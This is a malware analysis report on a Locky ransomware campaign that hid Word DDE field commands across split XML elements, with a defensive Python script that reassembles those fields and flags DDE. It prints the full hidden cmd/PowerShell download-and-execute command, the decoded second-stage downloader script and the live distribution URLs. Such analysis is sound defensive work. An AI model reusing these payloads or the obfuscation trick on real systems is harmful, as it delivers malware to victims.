Locky Ransomware Actors Adopt DDE Technique to Deliver Malware

The actors behind the Locky ransomware family adopted the recently publicised Dynamic Data Exchange (DDE) protocol vulnerability to deliver their malware. The DDE technique has been around for some time, but was brought to wider attention by SensePost on October 9, 2017. The technique allows code execution inside Microsoft Word without requiring malicious VBA macros.

Other criminals had already adopted DDE by this point. The Hancitor malware authors adapted their documents to use DDE on Monday, October 16, as detailed by the SANS ISC.

The October 19 Locky campaign involved spam emails distributed by the Necurs botnet with the subject line “Emailed Invoice – [random digits]”, delivering a Word document attachment with a filename similar to I_.doc.

The Locky actors regularly rotate and innovate their delivery tactics. There was no Locky activity on October 16–17, 2017 and they appear to have used that window to weaponise the DDE feature for this campaign.

Analysis of the Malicious Document

The DDE payload is embedded in the word/document.xml component of the Office Open XML archive, a WordprocessingML file made up of many XML elements.

The actors used an obfuscation technique also seen in the concurrent Hancitor campaign, breaking the malicious PowerShell command across several <w:instrText/> elements using the Rsid (Revision Identifier for Style Definition) attribute. This is a legitimate OpenXML feature for document merging that happens to be useful for splitting payloads across XML nodes.

A snippet of the embedded DDE command from document.xml:

<w:r w:rsidR="001E224B">
  <w:instrText>DDE</w:instrText>
</w:r>

The PowerShell download-and-execute routine follows (rsidR attributes removed for clarity):

<w:instrText>C:\\Windows\\System32\\</w:instrText>
<w:instrText>cmd</w:instrText>
<w:instrText>.exe</w:instrText>
<w:instrText xml:space="preserve"> </w:instrText>
<w:instrText>"</w:instrText>
<w:instrText xml:space="preserve">/k </w:instrText>
<w:instrText xml:space="preserve">powershell </w:instrText>
<w:instrText xml:space="preserve">-NoP -sta -NonI </w:instrText>
<w:instrText>-w hidden</w:instrText>
<w:instrText>$e=</w:instrText>
<w:instrText>(New-Object System.Net.WebClient).DownloadString('</w:instrText>
<w:instrText>http://ryanbaptistchurch.com/KJHDhbje71</w:instrText>

When the instrText fragments are reassembled, the full DDE command is:

DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71'); powershell -e $e"
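A defender's way of undoing this split, added here as an example and not code from the original report: the script opens a .docx, joins the <w:instrText> fragments of each field in word/document.xml, and flags any reassembled field code that begins with DDE or DDEAUTO. The embedded sample document is constructed for the example and mimics the rsid-split structure shown above.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)  # DDEAUTO fires on open

def reassemble_field_codes(document_xml: bytes) -> list[str]:
    """Join the <w:instrText> fragments of each field in document.xml.
    A complex field runs from <w:fldChar w:fldCharType="begin"/> to "end" and
    its code may be split over many <w:r> runs (the rsid trick above), so the
    fragments are concatenated per field; <w:fldSimple w:instr> is read whole."""
    root = ET.fromstring(document_xml)
    codes, current = [], None
    for el in root.iter():
        if el.tag == f"{{{W}}}fldSimple":
            codes.append(el.get(f"{{{W}}}instr", ""))
        elif el.tag == f"{{{W}}}fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                current = []
            elif kind == "end" and current is not None:
                codes.append("".join(current))
                current = None
        elif el.tag == f"{{{W}}}instrText" and current is not None:
            current.append(el.text or "")  # xml:space="preserve" text kept verbatim
    return codes

def find_dde_fields(docx_bytes: bytes) -> list[str]:
    """Open a .docx (an OOXML zip) and return the field codes that invoke DDE."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        xml = z.read("word/document.xml")
    return [c for c in reassemble_field_codes(xml) if DDE_RE.match(c)]

def build_sample_docx() -> bytes:
    """Constructed sample .docx: one rsid-split DDE field and a benign PAGE field."""
    parts = ["DDE", " ", "C:\\\\Windows\\\\System32\\\\", "cmd", ".exe", " ",
             '"/k ', "powershell ", "-w hidden", '"']
    runs = "".join(f'<w:r w:rsidR="001E224B"><w:instrText xml:space="preserve">'
                   f"{p}</w:instrText></w:r>" for p in parts)
    body = (f'<w:document xmlns:w="{W}"><w:body><w:p>'
            '<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
            '<w:p><w:fldSimple w:instr=" PAGE "/></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", body)
    return buf.getvalue()
```

Running find_dde_fields(build_sample_docx()) returns only the reassembled DDE code; the PAGE field is read but not flagged.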

This downloads the second-stage payload (a base64-encoded file) from:

hxxp://ryanbaptistchurch.com/KJHDhbje71

After base64 decoding, the second stage is a small PowerShell download-and-execute script:

$urls = "http://shamanic-extracts.biz/eurgf837or","http://centralbaptistchurchnj.org/eurgf837or","","http://conxibit.com/eurgf837or"

foreach($url in $urls){
    Try {
        Write-Host $url
        $fp = "$env:temp\rekakva32.exe"
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch {
        Write-Host $_.Exception.Message
    }
}

The third-stage binary downloaded by this script is a PE32 executable (MD5: 4f03e360be488a3811d40c113292bc01). This is the QTLoader downloader, analysed in detail in Locky Actors Adopt QTLoader to Deliver Ransomware.